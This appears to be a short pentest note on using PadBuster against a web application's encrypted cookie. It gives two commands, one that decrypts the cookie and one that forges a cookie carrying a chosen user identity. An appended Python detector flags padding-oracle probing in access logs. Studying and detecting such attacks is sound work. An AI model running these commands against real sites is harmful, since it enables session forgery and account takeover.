# PadBuster
* [AonCyberLabs' GitHub](https://github.com/AonCyberLabs/PadBuster.git)
* Padding Oracle
## Usage on Cookies
* Oracle on the cookie value: the website's error message for invalid padding is what PadBuster uses as the oracle (`-error`)
* A high-privileged user account can be set as the target plaintext with `-plaintext`

```sh
# Decrypt the cookie value; block size 8, the app's padding error page is the oracle
./padBuster.pl http://10.10.135.100/index.php 3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3 8 -cookies "hcon=3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3" -error "<website error>"
```

```sh
# Same oracle, but encrypt a chosen plaintext (e.g. another user account) instead of decrypting
./padBuster.pl http://$TARGET_IP/index.php 3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3 8 -cookies "session=3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3" -error "<website error>" -plaintext '<user>=<username>'
```
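As an added example (not part of this note or of the PadBuster project), detection logic a defender can run over web-server access logs to spot the request pattern the commands above produce: one client sending many requests with different values of the same cookie, most of them ending in the application's error response. It assumes a log format with the Cookie request header appended as a final quoted field; the sample log lines are constructed.

```python
import re
from collections import defaultdict

# Assumed format (an assumption, not from the page): Apache combined log with the
# request Cookie header appended as a final quoted field (LogFormat ... "%{Cookie}i").
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" "(?P<cookie>[^"]*)"$'
)

def _line(ip, path, status, cookie):
    """Build one constructed log line in the assumed format."""
    return (f'{ip} - - [01/Jan/2024:10:00:00 +0000] "GET {path} HTTP/1.1" {status} 512 '
            f'"-" "Mozilla/5.0" "{cookie}"')

# Constructed sample: 10.0.0.5 cycles through 40 mutated values of the "hcon" cookie and
# gets the error page (status 500 here) for all but three; 10.0.0.9 is a normal client.
SAMPLE_LOG = "\n".join(
    [_line("10.0.0.5", "/index.php", 500 if i % 16 else 200, f"hcon=AAAAAAAA{i:02x}")
     for i in range(40)]
    + [_line("10.0.0.9", "/index.php", 200, "hcon=3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3")] * 3
)

def detect_cookie_fuzzing(log_text, cookie_name="hcon", min_variants=16, min_error_ratio=0.5):
    """Return sorted (ip, path, distinct_cookie_values, requests, error_requests) tuples for
    clients that presented many distinct values of `cookie_name` to one path and mostly got
    a 5xx back. Both thresholds are tunable; the defaults suit the constructed sample."""
    variants, totals, errors = defaultdict(set), defaultdict(int), defaultdict(int)
    cookie_re = re.compile(rf'(?:^|;\s*){re.escape(cookie_name)}=([^;]*)')
    for raw in log_text.splitlines():
        m = LOG_RE.match(raw)
        if not m:
            continue  # skip unparseable records instead of aborting the whole scan
        c = cookie_re.search(m["cookie"])
        if not c:
            continue  # request did not carry the cookie of interest
        key = (m["ip"], m["path"])
        variants[key].add(c.group(1))
        totals[key] += 1
        if m["status"].startswith("5"):
            errors[key] += 1
    hits = []
    for key, vals in variants.items():
        if len(vals) >= min_variants and errors[key] / totals[key] >= min_error_ratio:
            hits.append((*key, len(vals), totals[key], errors[key]))
    return sorted(hits)

if __name__ == "__main__":
    for hit in detect_cookie_fuzzing(SAMPLE_LOG):
        print("possible padding-oracle probing:", hit)
```

In production the error condition should match whatever the application actually returns for bad padding (a specific status code, redirect, or body marker), and the counts should be bucketed by time window rather than over the whole file.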